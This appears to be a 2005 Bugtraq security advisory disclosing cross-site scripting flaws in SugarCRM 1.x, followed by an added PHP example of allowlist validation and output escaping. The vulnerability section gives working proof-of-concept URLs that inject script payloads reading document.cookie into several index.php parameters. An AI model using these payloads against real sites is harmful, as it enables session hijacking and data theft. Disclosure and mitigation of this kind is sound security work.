[38042] in bugtraq


Cross Site Scripting Vulnerabilities and Possible Code Execution

daemon@ATHENA.MIT.EDU (Joxean Koret)
Sat Jan 1 17:16:31 2005

From: Joxean Koret <joxeankoret@yahoo.es>
To: bugtraq@securityfocus.com,
        Full Disclosure <full-disclosure@lists.netsys.com>,
        Secunia <vuln@secunia.com>,
        Security Tracker <bugs@securitytracker.com>
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-sAl3l4aiY8J4OeFoMZRp"
Date: Sat, 01 Jan 2005 19:58:44 +0000
Message-Id: <1104609524.17665.4.camel@nemobox>
Mime-Version: 1.0



----------------------------------------------------------------------------
Cross Site Scripting Vulnerabilities and Possible Code Execution in SugarCRM
----------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SugarCRM 1.X - Manage leads, opportunities, contacts and more inside of a
state-of-the-art user interface. Built on PHP and MySQL.

Web : http://sugarcrm.sourceforge.net

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerability

A1. In the main script (index.php), various parameters that are used to
write the HTML code are not verified.

At least the following URLs are vulnerable to XSS (Cross Site
Scripting) attacks:

http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</script>&return_action=index

http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.cookie)</script>

http://<site-with-sugarcrm>/sugarcrm/index.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Search

And the following are vulnerable to XSS and, possibly, to arbitrary
remote PHP code execution as well:

http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=d676f046-1be5-dc36-114e-4138f972bf5d

http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD ID]"><script>alert(document.cookie)</script>


The fix:
~~~~~~~~

All problems are fixed in the latest versions available at the
SugarCRM site.
Go to http://sugarcrm.sourceforge.net for more info about the new
versions.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

	Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
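
The kind of input handling whose absence A1 describes, as an added PHP example that is not SugarCRM's code or its actual fix: selector parameters are checked against an allowlist and every value is HTML-escaped where it is written. The function names, the allowlist contents and the shape of the weak form are assumptions; the parameter names and the sample record id come from the URLs above.

```php
<?php
// Added example, not SugarCRM source. Function names and allowlist contents
// are hypothetical; parameter names are taken from the advisory's URLs.
const ALLOWED_MODULES = ['Accounts', 'Contacts'];   // constructed list
const ALLOWED_ACTIONS = ['index', 'EditView', 'DetailView', 'ListView'];

// Return $value only when it is an exact member of $allowed, else $default.
function allowlisted($value, array $allowed, string $default): string
{
    return in_array($value, $allowed, true) ? $value : $default;
}

// Accept a record id only in the GUID shape used by the advisory's sample.
function valid_record_id($value): ?string
{
    $guid = '/\A[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\z/i';
    return (is_string($value) && preg_match($guid, $value) === 1) ? $value : null;
}

// Escape for HTML text and quoted-attribute contexts.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Weak form (assumed shape; the advisory only says the parameters are
// written into the HTML unverified):
//   echo '<input type="hidden" name="return_module" value="' . $_GET['return_module'] . '">';

// Hardened form: validate the selector, then escape at the point of output.
function render_return_fields(array $query): string
{
    $module = allowlisted($query['return_module'] ?? null, ALLOWED_MODULES, 'Contacts');
    $action = allowlisted($query['return_action'] ?? null, ALLOWED_ACTIONS, 'index');
    return '<input type="hidden" name="return_module" value="' . h($module) . '">' . "\n"
         . '<input type="hidden" name="return_action" value="' . h($action) . '">' . "\n";
}

// Constructed request mirroring the first URL in the advisory.
$query = [
    'module' => 'Contacts', 'action' => 'EditView', 'return_action' => 'index',
    'return_module' => '"><script>alert(document.cookie)</script>',
];
echo render_return_fields($query);   // rejected value is replaced by the default
// Free-text fields such as the search "name" cannot be allowlisted: escape them.
echo '<input name="name" value="' . h($query['return_module']) . '">' . "\n";
// A record id carrying trailing markup fails the shape check.
var_dump(valid_record_id('d676f046-1be5-dc36-114e-4138f972bf5d"><script>'));
```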



